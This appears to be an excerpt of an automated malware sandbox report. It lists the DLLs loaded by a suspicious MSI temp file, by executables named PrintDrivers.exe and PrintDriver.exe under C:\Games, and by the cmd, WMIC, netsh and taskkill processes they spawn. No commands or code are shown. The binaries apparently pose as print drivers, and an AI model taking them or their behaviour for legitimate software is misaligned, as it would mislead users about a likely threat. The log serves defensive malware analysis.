                  Source: C:\Windows\Installer\MSI4384.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: twinui.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mrmcorer.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47mrm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.ui.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windowmanagementapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: inputhost.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mode.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mode.comSection loaded: ureg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mode.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mode.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mode.comSection loaded: ureg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mode.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: version.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: riched32.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Games\PrintDriver.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: windows.storage.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: wldp.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: kernel.appcore.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: uxtheme.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: propsys.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: profapi.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: edputil.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: urlmon.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: iertutil.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: srvcli.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: netutils.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: sspicli.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: wintypes.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: appresolver.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: bcp47langs.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: slc.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: userenv.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: sppc.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Games\PrintDrivers.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\SysWOW64\mode.comSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\mode.comSection loaded: ureg.dll
                  Source: C:\Windows\SysWOW64\mode.comSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
